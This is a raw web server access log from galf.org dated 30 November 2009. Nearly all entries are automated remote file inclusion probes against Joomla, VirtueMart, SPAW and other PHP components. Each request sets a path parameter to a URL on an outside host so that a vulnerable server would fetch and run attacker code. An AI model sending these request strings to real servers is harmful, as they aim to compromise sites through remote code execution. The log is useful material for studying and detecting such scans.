91.192.20.164 - - [30/Nov/2009:01:58:42 -0800] "GET /logs/access_090907.log//bp_ncom.php?bnrep=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [30/Nov/2009:01:59:06 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [30/Nov/2009:01:59:06 -0800] "GET /logs/access_090622.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [30/Nov/2009:01:59:06 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [30/Nov/2009:01:59:24 -0800] "GET /logs/access_090511.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:01:08 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:01:30 -0800] "GET /logs/access_090622.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:02:02:05 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:02:03:06 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.152 - - [30/Nov/2009:02:03:24 -0800] "GET /logs/access_090420.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:02:03:29 -0800] "GET /logs/access_091116.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:07:08 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:09:09 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:09:10 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:02:12:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:02:12:06 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:02:12:06 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:02:12:14 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:02:12:14 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:02:12:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:02:12:26 -0800] "GET /logs/access_090622.log////saveserver.php?thisdir=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:02:12:41 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:02:12:41 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:02:12:41 -0800] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:02:13:40 -0800] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:02:13:40 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:02:13:40 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:13:42 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:13:43 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:13:44 -0800] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [30/Nov/2009:02:14:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [30/Nov/2009:02:14:01 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [30/Nov/2009:02:14:01 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:02:14:08 -0800] "GET /logs/access_090525.log////saveserver.php?thisdir=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:02:14:16 -0800] "GET /logs/access_090622.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:02:14:29 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:02:14:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:02:14:29 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:02:14:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:02:14:34 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:02:14:34 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.195.115.152 - - [30/Nov/2009:02:17:15 -0800] "GET /logs/?M=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:18:02 -0800] "GET /logs/access_090622.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:02:18:45 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:02:18:45 -0800] "GET /logs///admin/spaw/spaw_control.class.php?spaw_root=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:02:18:45 -0800] "GET /logs/access_091019.log%20%20///admin/spaw/spaw_control.class.php?spaw_root=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [30/Nov/2009:02:19:09 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [30/Nov/2009:02:19:09 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [30/Nov/2009:02:19:10 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:19:36 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:19:36 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:19:38 -0800] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [30/Nov/2009:02:19:59 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [30/Nov/2009:02:19:59 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [30/Nov/2009:02:19:59 -0800] "GET /logs/access_090713.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:02:21:31 -0800] "GET /logs/access_091019.log///admin/spaw/spaw_control.class.php?spaw_root=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.204 - - [30/Nov/2009:02:21:32 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:02:24:33 -0800] "GET /logs/access_090928.log///admin/spaw/spaw_control.class.php?spaw_root=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:02:24:49 -0800] "GET /logs/access_090810.log///admin/spaw/spaw_control.class.php?spaw_root=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:02:25:00 -0800] "GET /logs/access_090622.log///admin/spaw/spaw_control.class.php?spaw_root=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.74.146.178 - - [30/Nov/2009:02:25:23 -0800] "GET /include/lib.inc.php?site_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:26:40 -0800] "GET /skin/uks_gallery/setup.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:26:40 -0800] "GET /logs/access_091026.log%20%20//skin/uks_gallery/setup.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:26:40 -0800] "GET /logs//skin/uks_gallery/setup.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:26:40 -0800] "GET /skin/uks_gallery/setup.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:26:40 -0800] "GET /logs//skin/uks_gallery/setup.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:26:40 -0800] "GET /logs/access_091026.log//skin/uks_gallery/setup.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:26:49 -0800] "GET /logs/access_090817.log//skin/uks_gallery/setup.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.58.71.90 - - [30/Nov/2009:02:27:12 -0800] "GET /logs/access_090713.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:27:22 -0800] "GET /logs/access_090817.log%20%20//skin/uks_gallery/setup.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [30/Nov/2009:02:28:44 -0800] "GET /logs/access_091005.log//admin/spaw/spaw_control.class.php?spaw_root=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:33:51 -0800] "GET /skin/uks_gallery/setup.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:33:51 -0800] "GET /logs/access_090817.log//skin/uks_gallery/setup.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.165 - - [30/Nov/2009:02:33:51 -0800] "GET /logs//skin/uks_gallery/setup.php?dir=http://kmcuria.com/bbs/include/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:36:54 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [30/Nov/2009:02:37:42 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.74.146.178 - - [30/Nov/2009:02:37:42 -0800] "GET /logs/access_090511.log//include/lib.inc.php?site_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
80.74.146.178 - - [30/Nov/2009:02:37:42 -0800] "GET /include/lib.inc.php?site_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
80.74.146.178 - - [30/Nov/2009:02:37:43 -0800] "GET /logs//include/lib.inc.php?site_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [30/Nov/2009:02:37:45 -0800] "GET /logs/access_090511.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [30/Nov/2009:02:37:51 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [30/Nov/2009:02:38:05 -0800] "GET /logs/access_090831.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:02:43:03 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [30/Nov/2009:02:43:10 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.23.47 - - [30/Nov/2009:02:43:10 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.23.47 - - [30/Nov/2009:02:43:10 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.23.47 - - [30/Nov/2009:02:43:10 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.23.47 - - [30/Nov/2009:02:43:10 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.23.47 - - [30/Nov/2009:02:43:10 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:43:49 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:43:49 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:43:49 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:43:50 -0800] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:43:50 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:43:50 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.71.237.150 - - [30/Nov/2009:02:45:03 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:02:45:06 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:02:45:06 -0800] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:02:45:19 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:02:45:19 -0800] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:02:45:19 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.futurenetwork.com.br/loja/images/fxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:45:33 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:45:33 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:45:33 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:45:40 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:45:40 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:45:40 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:02:46:21 -0800] "GET /logs/scripts.log////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:46:21 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:46:22 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:46:47 -0800] "GET /logs/access.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:46:47 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:02:46:47 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.3.124.199 - - [30/Nov/2009:02:46:48 -0800] "GET /logs/access_091026.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
